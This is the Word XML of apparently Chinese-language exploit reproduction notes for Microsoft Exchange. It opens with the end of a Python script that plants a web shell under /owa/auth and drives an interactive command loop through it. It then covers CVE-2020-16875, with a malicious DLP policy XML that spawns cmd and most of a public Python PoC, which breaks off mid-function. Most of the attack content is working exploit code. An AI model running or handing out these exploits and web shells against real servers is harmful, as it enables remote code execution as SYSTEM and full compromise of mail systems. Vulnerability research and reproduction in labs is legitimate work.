        <w:t xml:space="preserve">                                "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                "FilePathName": shell_absolute_path}}}</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&amp;msExchEcpCanary=%s&amp;a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "msExchLogonMailbox": "S-1-5-20",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Content-Type": "application/json; charset=utf-8",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "User-Agent": user_agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
        <w:br/>
        <w:t xml:space="preserve">                json=reset_oab_body,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                proxies=proxies,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                verify=False</w:t>
        <w:br/>
        <w:t xml:space="preserve">            )</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            if ct.status_code != 200:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print("写入shell失败")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                exit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">            shell_url = "https://"+target+"/owa/auth/test11.aspx"</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("成功写入shell：" + shell_url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("下面验证shell是否ok")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());')</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("正在请求shell")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            import time</w:t>
        <w:br/>
        <w:t xml:space="preserve">            time.sleep(1)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            data = requests.post(shell_url, data={</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                "code": "Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"}, verify=False, proxies=proxies)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if data.status_code != 200:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print("写入shell失败")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print("shell:"+data.text.split("OAB (Default Web Site)")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    [0].replace("Name                            : ", ""))</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print('[+]用户名: '+ new_email)</w:t>
        <w:br/>
        <w:t xml:space="preserve">                final_shell = shell_url</w:t>
        <w:br/>
        <w:t xml:space="preserve">                break</w:t>
        <w:br/>
        <w:t xml:space="preserve">        except:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print('[-]用户名: '+new_email)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("=============================")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not final_shell:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sys.exit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print("下面启用交互式shell")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    while True:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        input_cmd = input("[#] command: ")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        data={"code": """Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c %s").stdout.readall())""" % input_cmd}</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ct = requests.post(</w:t>
        <w:br/>
        <w:t xml:space="preserve">            final_shell,</w:t>
        <w:br/>
        <w:t xml:space="preserve">            data=data,verify=False, proxies=proxies)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if ct.status_code != 200 or "OAB (Default Web Site)" not in ct.text:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("[*] Failed to execute shell command")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            shell_response = ct.text.split(</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Name                            :")[0]</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print(shell_response)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="203"/>
    <w:bookmarkStart w:name="um1xs" w:id="20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CVE-2020-16875</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="204"/>
    <w:bookmarkStart w:name="ua146bb06" w:id="205"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId4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CVE-2020-16875漏洞分析与复现</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="205"/>
    <w:bookmarkStart w:name="u29680439" w:id="206"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId48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Exchange漏洞分析系列 CVE-2020-16875-安全客 - 安全资讯平台</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="206"/>
    <w:bookmarkStart w:name="AGnrQ" w:id="20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漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="207"/>
    <w:bookmarkStart w:name="u10a6666e" w:id="2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2"/>
        </w:rPr>
        <w:t>由于对cmdlet参数的验证不正确，Microsoft Exchange服务器中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在系统用户的上下文中运行任意代码。利用此漏洞需要拥有以某个Exchange角色进行身份验证的用户权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="208"/>
    <w:bookmarkStart w:name="XdFGQ" w:id="20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262626"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="209"/>
    <w:bookmarkStart w:name="u83229118" w:id="2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8"/>
        </w:rPr>
        <w:t>Exchange Server 2016 CU17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Exchange Server 2016 CU16（已测）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Exchange Server 2019 CU5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Exchange Server 2019 CU6</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="210"/>
    <w:bookmarkStart w:name="jeDvx" w:id="2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漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="211"/>
    <w:bookmarkStart w:name="lwVxO" w:id="212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版本确认</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="212"/>
    <w:bookmarkStart w:name="ud6521ce6" w:id="2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2"/>
        </w:rPr>
        <w:t>在outlook界面查看源代码，通过查看link标签中的数字与链接</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="213"/>
    <w:bookmarkStart w:name="GhCWq" w:id="21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https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="214"/>
    <w:bookmarkStart w:name="u6bc69372" w:id="2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2"/>
        </w:rPr>
        <w:t>中的内部版本号进行对比即可判断版本。由于官方文档中所列出的为各个主要发行版本，因此可能会出现link标签中的数值出现在两个版本中间的情况。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="215"/>
    <w:bookmarkStart w:name="u37be9de7" w:id="216"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u016bbc00" w:id="217"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="246529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634133" cy="448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7"/>
    </w:p>
    <w:bookmarkEnd w:id="216"/>
    <w:bookmarkStart w:name="u05ea8c3c" w:id="218"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u2cb0b510" w:id="219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="425293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87066" cy="479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"/>
    </w:p>
    <w:bookmarkEnd w:id="218"/>
    <w:bookmarkStart w:name="UciVq" w:id="22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额外操作</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="220"/>
    <w:bookmarkStart w:name="uf0b118b7" w:id="2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Exchange环境搭建好后，请新建一个邮箱账户，比如hello。然后在服务器上打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exchange Management Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，并在其中执行：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="221"/>
    <w:bookmarkStart w:name="sFqCV" w:id="22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New-RoleGroup -Name "dlp users" -Roles "Data Loss Prevention" -Members "hello" </w:t>
        <w:br/>
        <w:t xml:space="preserve">Get-RoleGroup "dlp users" | Format-List </w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="222"/>
    <w:bookmarkStart w:name="udfaedad2" w:id="2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上面的操作是在对应账户hello上开启Data Loss Prevention角色(该漏洞利用需要满足的条件)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="223"/>
    <w:bookmarkStart w:name="d63rp" w:id="22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漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="224"/>
    <w:bookmarkStart w:name="eXW8Z" w:id="225"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5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手动利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="225"/>
    <w:bookmarkStart w:name="ue49df836" w:id="2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条件：拿到的用户账号可以访问https://XXX.XXX.XXX.XXX/ecp/DLPPolicy/ManagePolicyFromISV.aspx</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="226"/>
    <w:bookmarkStart w:name="uf5873a94" w:id="2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也即账户需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="fbde28"/>
        </w:rPr>
        <w:t>Data Loss Prevention</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>角色</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="227"/>
    <w:bookmarkStart w:name="uadf546aa" w:id="228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访问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/ecp/DLPPolicy/ManagePolicyFromISV.aspx目录</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="228"/>
    <w:bookmarkStart w:name="u4580c98c" w:id="229"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u258f4ec5" w:id="230"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="24010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904133" cy="48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0"/>
    </w:p>
    <w:bookmarkEnd w:id="229"/>
    <w:bookmarkStart w:name="ud6edf807" w:id="2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可以看到该页面可以上传一个DLP的策略模版XML文件。该XML文件模版样式可以从https://docs.microsoft.com/en-us/exchange/developing-dlp-policy-template-files-exchange-2013-help中找到。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="231"/>
    <w:bookmarkStart w:name="H80JA" w:id="23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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;dlpPolicyTemplates&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;contentVersion&gt;4&lt;/contentVersion&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;publisherName&gt;Microsoft&lt;/publisherName&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;name&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;localizedString lang="en"&gt;PCI-DSS-12345&lt;/localizedString&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/name&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;localizedString lang="en"&gt;Detects the presence of information subject to Payment Card Industry Data Security Standard (PCI-DSS) compliance requirements.&lt;/localizedString&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/description&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;keywords&gt;&lt;/keywords&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;ruleParameters&gt;&lt;/ruleParameters&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;policyCommands&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;!-- The contents below are applied/executed as rules directly in PS - --&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;commandBlock&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;![CDATA[ $i=New-object System.Diagnostics.ProcessStartInfo;$i.UseShellExecute=$true;$i.FileName="cmd";$i.Arguments="/c cmd.exe";$r=New-Object System.Diagnostics.Process;$r.StartInfo=$i;$r.Start(); ]]&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/commandBlock&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/policyCommands&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;policyCommandsResources&gt;&lt;/policyCommandsResources&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/dlpPolicyTemplate&gt;</w:t>
        <w:br/>
        <w:t>&lt;/dlpPolicyTemplates&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="232"/>
    <w:bookmarkStart w:name="u43776440" w:id="2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我们再到浏览器中的/ecp/DLPPolicy/ManagePolicyFromISV.aspx页面，上传POC.xml，。最后点击保存，即可在服务器端触发漏洞。见下面演示。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="233"/>
    <w:bookmarkStart w:name="ue1bc602a" w:id="234"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u0cea85bc" w:id="235"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="438117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975600" cy="59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5"/>
    </w:p>
    <w:bookmarkEnd w:id="234"/>
    <w:bookmarkStart w:name="ue0696c10" w:id="2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另外，如果我们在Exchange服务器上使用Exchange Management Shell执行下面命令，可以看到w3wp.exe进程也弹出了System权限的cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="236"/>
    <w:bookmarkStart w:name="Ygh7o" w:id="23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New-DlpPolicy -Name "PCI-DSS-12345" -TemplateData ([Byte[]]$(Get-Content -Path 'C:\work\poc.xml' -Encoding Byte -ReadCount 0))</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="237"/>
    <w:bookmarkStart w:name="mHBCI" w:id="238"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5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脚本利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="238"/>
    <w:bookmarkStart w:name="uef9f0d67" w:id="2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4"/>
        </w:rPr>
        <w:t>POC下载地址：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="239"/>
    <w:bookmarkStart w:name="mWbqQ" w:id="24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https://srcincite.io/pocs/cve-2020-16875.py.txt</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="240"/>
    <w:bookmarkStart w:name="Ld5iN" w:id="24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#!/usr/bin/env python3</w:t>
        <w:br/>
        <w:t>"""</w:t>
        <w:br/>
        <w:t>Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability</w:t>
        <w:br/>
        <w:t>Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t># Notes:</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>The (ab)user needs the "Data Loss Prevention" role assigned and if performing the attack over the ecp interface (this poc) then the user will need an active mailbox.</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>[PS] C:\Windows\system32&gt;New-RoleGroup -Name "dlp users" -Roles "Data Loss Prevention" -Members "harrym"</w:t>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
        <w:br/>
        <w:t>Name      AssignedRoles          RoleAssignments                  ManagedBy</w:t>
        <w:br/>
        <w:t>----      -------------          ---------------                  ---------</w:t>
        <w:br/>
        <w:t>dlp users {Data Loss Prevention} {Data Loss Prevention-dlp users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>[PS] C:\Windows\system32&gt;Get-RoleGroup "dlp users" | Format-List</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>RunspaceId                  : 098e1140-30e3-4144-8028-2174fdb43b85</w:t>
        <w:br/>
        <w:t>ManagedBy                   : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}</w:t>
        <w:br/>
        <w:t>RoleAssignments             : {Data Loss Prevention-dlp users}</w:t>
        <w:br/>
        <w:t>Roles                       : {Data Loss Prevention}</w:t>
        <w:br/>
        <w:t>DisplayName                 :</w:t>
        <w:br/>
        <w:t>ExternalDirectoryObjectId   :</w:t>
        <w:br/>
        <w:t>Members                     : {exchangedemo.com/Users/Harry Mull}</w:t>
        <w:br/>
        <w:t>SamAccountName              : dlp users</w:t>
        <w:br/>
        <w:t>Description                 :</w:t>
        <w:br/>
        <w:t>RoleGroupType               : Standard</w:t>
        <w:br/>
        <w:t>LinkedGroup                 :</w:t>
        <w:br/>
        <w:t>Capabilities                : {}</w:t>
        <w:br/>
        <w:t>LinkedPartnerGroupId        :</w:t>
        <w:br/>
        <w:t>LinkedPartnerOrganizationId :</w:t>
        <w:br/>
        <w:t>Identity                    : exchangedemo.com/Microsoft Exchange Security Groups/dlp users</w:t>
        <w:br/>
        <w:t>IsValid                     : True</w:t>
        <w:br/>
        <w:t>ExchangeVersion             : 0.10 (14.0.100.0)</w:t>
        <w:br/>
        <w:t>Name                        : dlp users</w:t>
        <w:br/>
        <w:t>DistinguishedName           : CN=dlp users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com</w:t>
        <w:br/>
        <w:t>Guid                        : fa5c8458-8255-4ffd-b128-2a66bf9dbfd6</w:t>
        <w:br/>
        <w:t>ObjectCategory              : exchangedemo.com/Configuration/Schema/Group</w:t>
        <w:br/>
        <w:t>ObjectClass                 : {top, group}</w:t>
        <w:br/>
        <w:t>WhenChanged                 : 6/12/2020 11:29:31 PM</w:t>
        <w:br/>
        <w:t>WhenCreated                 : 6/12/2020 11:29:31 PM</w:t>
        <w:br/>
        <w:t>WhenChangedUTC              : 6/12/2020 3:29:31 PM</w:t>
        <w:br/>
        <w:t>WhenCreatedUTC              : 6/12/2020 3:29:31 PM</w:t>
        <w:br/>
        <w:t>OrganizationId              :</w:t>
        <w:br/>
        <w:t>Id                          : exchangedemo.com/Microsoft Exchange Security Groups/dlp users</w:t>
        <w:br/>
        <w:t>OriginatingServer           : DEAD01.exchangedemo.com</w:t>
        <w:br/>
        <w:t>ObjectState                 : Changed</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t># Example:</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>researcher@incite:~$ ./poc.py</w:t>
        <w:br/>
        <w:t>(+) usage: ./poc.py &lt;target&gt; &lt;user:pass&gt; &lt;cmd&gt;</w:t>
        <w:br/>
        <w:t>(+) eg: ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>researcher@incite:~$ ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint</w:t>
        <w:br/>
        <w:t>(+) logged in as harrym@exchangedemo.com</w:t>
        <w:br/>
        <w:t>(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5</w:t>
        <w:br/>
        <w:t>(+) executed mspaint as SYSTEM!</w:t>
        <w:br/>
        <w:t>"""</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>import re</w:t>
        <w:br/>
        <w:t>import sys</w:t>
        <w:br/>
        <w:t>import random</w:t>
        <w:br/>
        <w:t>import string</w:t>
        <w:br/>
        <w:t>import urllib3</w:t>
        <w:br/>
        <w:t>import requests</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>def random_string(str_len=8):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    letters = string.ascii_lowercase</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return ''.join(random.choice(letters) for i in range(str_len))</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>def get_xml(c):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return """&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;dlpPolicyTemplates&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;contentVersion&gt;4&lt;/contentVersion&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;publisherName&gt;si&lt;/publisherName&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;name&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;localizedString lang="en"&gt;&lt;/localizedString&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/name&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;localizedString lang="en"&gt;&lt;/localizedString&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/description&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;keywords&gt;&lt;/keywords&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;ruleParameters&gt;&lt;/ruleParameters&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;policyCommands&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;commandBlock&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;![CDATA[ $i=New-object System.Diagnostics.ProcessStartInfo;$i.UseShellExecute=$true;$i.FileName="cmd";$i.Arguments="/c %s";$r=New-Object System.Diagnostics.Process;$r.StartInfo=$i;$r.Start() ]]&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/commandBlock&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/policyCommands&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;policyCommandsResources&gt;&lt;/policyCommandsResources&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/dlpPolicyTemplate&gt;</w:t>
        <w:br/>
        <w:t>&lt;/dlpPolicyTemplates&gt;""" % c</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>def trigger_rce(t, s, vs, cmd):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    f = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        '__VIEWSTATE': (None, vs),</w:t>
        <w:br/>
        <w:t xml:space="preserve">        'ctl00$ResultPanePlaceHolder$senderBtn': (None, "ResultPanePlaceHolder_ButtonsPanel_btnNext"),</w:t>
        <w:br/>
        <w:t xml:space="preserve">        'ctl00$ResultPanePlaceHolder$contentContainer$name': (None, random_string()),</w:t>
        <w:br/>
        <w:t xml:space="preserve">        'ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl': ("dlprce.xml", get_xml(cmd)),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r = s.post("https://%s/ecp/DLPPolicy/ManagePolicyFromISV.aspx" % t, files=f, verify=False)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    assert r.status_code == 200, "(-) failed to trigger rce!"</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>def leak_viewstate(t, s):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r = s.get("https://%s/ecp/DLPPolicy/ManagePolicyFromISV.aspx" % t, verify=False)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    match = re.search("&lt;input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=\"(.*)\" /&gt;", r.text)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    assert match != None, "(-) couldn't leak the __viewstate!"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return match.group(1)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>def log_in(t, usr, pwd):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    s = requests.Session()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    d = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "destination": "https://%s/owa" % t,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "flags": "",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "username": usr,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "password": pwd</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    s.post("https://%s/owa/auth.owa" % t, data=d, verify=False)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    assert s.cookies.get(name='X-OWA-CANARY') != None, "(-) couldn't leak the csrf canary!"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return s</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>def main(t, usr, pwd, cmd):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    s = log_in(t, usr, pwd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print("(+) logged in as %s" % usr)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    vs = leak_viewstate(t, s)</w:t>
        <w:br/>
